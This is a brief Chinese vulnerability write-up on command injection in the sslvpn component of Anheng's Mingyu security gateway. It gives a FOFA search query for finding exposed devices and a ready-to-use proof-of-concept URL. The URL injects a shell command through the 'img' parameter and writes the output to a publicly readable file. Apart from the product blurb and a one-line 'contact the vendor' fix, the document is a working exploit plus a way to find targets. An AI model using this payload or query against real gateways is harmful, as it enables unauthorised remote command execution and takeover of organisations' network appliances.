Nx01 产品简介
明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。
Nx02 漏洞描述
明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。
Nx03 产品主页
fofa-query: web.body="明御安全网关"
Nx04 漏洞复现
POC:
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls
拼接URL/sslvpn/ceshi.txt
Nx05 修复建议
建议联系软件厂商进行处理。